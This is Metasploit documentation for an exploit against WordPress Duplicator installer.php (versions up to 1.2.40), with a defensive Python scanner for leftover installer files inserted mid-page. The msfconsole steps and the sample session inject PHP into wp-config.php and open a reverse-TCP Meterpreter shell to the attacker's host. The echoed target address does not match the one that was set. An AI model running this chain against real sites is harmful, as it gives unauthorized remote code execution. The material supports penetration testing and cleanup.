metasploit-gs/documentation/modules/exploit/multi/php/wordpress_duplicator.md
Julien Legras 2b61c4e118 Fixes for PR
2018-11-29 15:02:03 +01:00


Duplicator by Snap Creek is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:

  • A ZIP archive with the complete WordPress files and Duplicator-specific files:
    • A copy of the installer.php script: installer-backup.php
    • A SQL script that will be used to restore the database content: database.sql
  • An installer PHP script to restore the archive: installer.php

When installer.php completes its process, the following files remain in the directory and have to be deleted manually:

  • The ZIP archive
  • database.sql
  • installer-backup.php
  • installer-data.sql
  • installer-log.txt
  • installer.php
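
A defender-side check for the leftovers listed above, as an added example that is not part of the module or of Duplicator: it walks a web root, matches the listed file names, and recognizes the archive by its contents (installer-backup.php and database.sql), since this page does not give the ZIP's name. The function names and the sample web root are constructed for illustration.

```python
import os
import tempfile
import zipfile

# Names the page lists as left behind, then the two files it says the archive holds.
LEFTOVER_NAMES = {"installer.php", "installer-backup.php", "database.sql",
                  "installer-data.sql", "installer-log.txt"}
ARCHIVE_MARKERS = {"installer-backup.php", "database.sql"}


def is_duplicator_archive(path):
    """True if the ZIP holds both marker files (matched by base name)."""
    try:
        with zipfile.ZipFile(path) as zf:
            return ARCHIVE_MARKERS <= {os.path.basename(n) for n in zf.namelist()}
    except (zipfile.BadZipFile, OSError):
        return False


def find_leftovers(webroot):
    """Return sorted relative paths of Duplicator leftovers under webroot."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower() in LEFTOVER_NAMES or (
                name.lower().endswith(".zip") and is_duplicator_archive(full)
            ):
                hits.append(os.path.relpath(full, webroot))
    return sorted(hits)


def build_sample_webroot():
    """Constructed sample: a restored site with leftovers still in place."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for name in ("index.php", "installer.php", "installer-log.txt"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("<?php // constructed sample\n")
    with zipfile.ZipFile(os.path.join(root, "site_backup.zip"), "w") as zf:
        zf.writestr("installer-backup.php", "<?php // sample\n")
        zf.writestr("database.sql", "-- sample\n")
    with zipfile.ZipFile(os.path.join(root, "photos.zip"), "w") as zf:
        zf.writestr("a.txt", "unrelated")
    return root


if __name__ == "__main__":
    for hit in find_leftovers(build_sample_webroot()):
        print("leftover:", hit)
```

Name matching does not catch an installer that has been renamed, as with /installer_vuln.php in the scenario on this page, so treat an empty result as "none of the default names found" rather than as proof of a clean directory.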

WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the WordPress instance.

Vulnerable application

Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup. Put the installer.php and archive files on a clean web server.

Verification Steps

Confirm that functionality works:

  1. Start msfconsole
  2. use exploit/multi/php/wordpress_duplicator
  3. Set the RHOST.
  4. Confirm the target is vulnerable: check
  5. Confirm that the output reads: The target is vulnerable.
  6. Set a payload: set PAYLOAD php/meterpreter/reverse_tcp
  7. Set LHOST and LPORT
  8. Run the exploit: run
  9. Confirm you now have a Meterpreter session

Options

TARGETURI

The path to the installer.php file to exploit. By default, the path is /installer.php.

Scenarios

Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40

msf5 > use exploit/multi/php/wordpress_duplicator 
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 1.1.1.1

meterpreter > sysinfo 
Computer    : debian
OS          : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux